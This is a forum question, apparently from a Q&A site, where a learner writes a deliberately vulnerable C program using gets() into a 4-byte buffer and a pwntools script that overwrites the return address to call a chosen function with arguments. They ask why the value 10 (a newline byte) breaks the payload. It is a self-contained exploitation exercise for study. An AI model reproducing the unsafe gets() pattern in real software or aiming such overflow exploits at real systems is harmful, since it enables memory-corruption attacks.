pwntools p32(arg1) got issue when arg1=10, maybe because 0xa
I was tring to learn stackoverflow so I wrote me a program, here's the source code:
# include <stdio.h>

void pwn(int a, int b) {
    printf("Pwned! arg1 = %d, arg2 = %d\n", a, b);
}

void vuln_copier(int m, int n){
    printf("m = %d, n = %d\n", m, n);
    char buffer[4];
    gets(buffer);
}

void main(){
    int m = 1;
    int n = 2;
    vuln_copier(m,n);
}

I compiled the source code with following command
gcc -g -m32 calling.c -o calling

Then I wrote an exp by using pwntools:
from pwn import *

context.terminal = ['tmux', 'splitw', '-h']
context.log_level = 'debug'

e = ELF('./calling')

offset = 16
pwn_addr = e.symbols['pwn']
log.success(f'pwn_addr: {hex(pwn_addr)}')
main_addr = e.symbols['main']
log.success(f'main_addr: {hex(main_addr)}')
arg1 = 10
arg2 = 20
p = e.process()


payload = b"".join([
    b'A' * offset,
    p32(pwn_addr),
    p32(main_addr),
    p32(arg1),
    p32(arg2)
])

gdb.attach(p, gdbscript='''
           b *main
           b *vuln_copier
           b *0x80491b4
           b *0x80491cd
           n
           ''')

p.sendline(payload)
p.interactive()

The binary can be pwned successfully, yet the output looks like this:

m = 1, n = 2
Pwned! arg1 = 0, arg2 = 0

if I change the arguments to arg1=11, arg2=10, the output will looks like:

m = 1, n = 2
Pwned! arg1 = 11, arg2 = 0

the exp will work fine unless I choose 10 as any argument.
I think this issue is caused by 10 = 0xa and 0xa represents \n in assembly language. But I wonder what can I do to make arg1 = 10 and print out correctly?  Thanks for all the helps!

gets stops reading at the \n and deletes it.

I see, that's the point. Thanks a lot!
But I keep wondering is there any method that allows me to set arg1=10 without changing the source code?
